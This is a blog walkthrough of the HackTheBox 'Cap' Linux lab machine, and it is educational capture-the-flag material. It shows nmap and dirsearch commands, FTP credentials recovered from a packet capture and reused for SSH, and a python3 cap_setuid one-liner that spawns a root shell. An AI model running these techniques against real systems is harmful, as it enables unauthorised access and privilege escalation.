Cap HackTheBox WalkThrough

Cap HackTheBox WalkThrough

This is Cap HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Cap HackTheBox machine. Before starting let us know something about this box. It is a Linux OS box with IP address 10.10.10.245 and difficulty level Easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Cap machine by pinging its IP 10.10.10.245. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used nmap for this task and the result is given below: –

Scanning

$ sudo nmap -sV -sT -p- -oN full-port.nmap 10.10.10.245
Nmap scan result during Cap HackTheBox WalkThrough

Nmap found ports 21, 22 and 80 as open. vsftpd 3.0.3 on port 21, OpenSSH 8.2p1 on port 22 and gunicorn web server on port 80 are running. Since ftp server is running so firstly, I tried to check whether anonymous login is allowed or not. There is no anonymous login allowed. Then I googled vsftpd 3.0.3 exploit for any exploit related to this version but no any exploit found.

After that I began to enumerate on port 80. Since web server is running on port 80 so there must be some website present that can be accessed through the URL http://10.10.10.245/. So let us see what is present at this URL. The website at http://10.10.10.245 is a Security Dashboard that gives the statistics of all the Security Events occurred at IP 10.10.10.245. Nathan is a user already logged in into this website so he can be our potential user when we will be inside this machine.

Web Page of Cap HackTheBox machine

Since we have username nathan so I started bruteforcing on ftp login and put them to run in background. Meanwhile I tried to check for command injection vulnerability at the URL http://10.10.10.245/netstat and http://10.10.10.245/ip because this application is executing OS command here. But no Command Injection vulnerability found. After some further enumeration when I didn’t get anything interesting then as usual, I tried directory bruteforcing.

Directory Bruteforcing

$ sudo dirsearch -u http://10.10.10.245/ -e all -t 100 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt | tee dirsearch.out
Directory Bruteforcing 1 on Cap machine
$ sudo dirsearch -u http://10.10.10.245/data/ -e all -r 4 -t 100 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt | tee dirsearch-data.out
Directory Bruteforcing 2 on Cap machine

Directory bruteforcing found many numbers of files. When we access each path, we will get different sniffed file. Then I downloaded file from URL http://10.10.10.245/data/0 and opened this file with $ wireshark (a network protocol analyzer) to analyze the traffic captured into it.

$ wireshark 0.pcap
Finding credential in 0.pcap file through Wireshark during Cap HTB Writeup

This file contains the login credentials of nathan’s ftp account. We can clearly see the handshake because ftp transfers the credential in cleartext format. This is the reason ftp is now replaced with sftp (secure ftp) where login requests are encrypted and any user capturing the traffic won’t be able to see the credentials in cleartext format.

From above the captured ftp credential is nathan: Buck3tH4TF0RM3!.

When I tried to use this credential to login into nathan’s ftp account I could login and I can also login into the SSH account of user nathan. This is due to the reuse of same credential in two different accounts. So let us SSH into nathan account.

Getting User Shell

$ ssh [email protected]
~Buck3tH4TF0RM3!
$ whoami && id
Getting User Shell in Cap HackTheBox machine during its walkthrough

We are successfully logged in into nathan account. Let us capture user flag.

Capture User Flag

$ cat user.txt
Capturing user flag in Cap HTB

Privilege Escalation

To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts like linpeas.sh, LinEnum.sh and there are a lot more. I have used linpeas.sh for this task.

Finding PrivEsc Vector

Linpeas found that cap_setuid capability is set to python3 binary. Capabilities are some special rights given to particular program or command. Here, cap_setuid capability is assigned to python3 which means python3 can change the UID (User ID) of any user without being asked for root permission. So here our potential privilege escalation vector can be getting root by exploiting Capabilities if we would be able to change the UID of user nathan to 0 (viz. UID of root).

Linpeas Result

When I tried to change the UID of user nathan using python3 I could easily upgrade user nathan to root. So, indeed here our privilege escalation vector is Capability Exploitation to get root. If you don’t know anything about capability then this article can be a boon for you.

To get root shell follow the given steps.

Getting Root Shell

$ /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami && id
GettingRoot Shell in Cap HackTheBox machine during its walkthrough

We have successfully got root. Let us capture root flag.

Capture Root Flag

$ cat /root/root.txt
Capturing Root Flag in Cap HTB

This was how I rooted Cap HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the walkthrough feel free to write us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/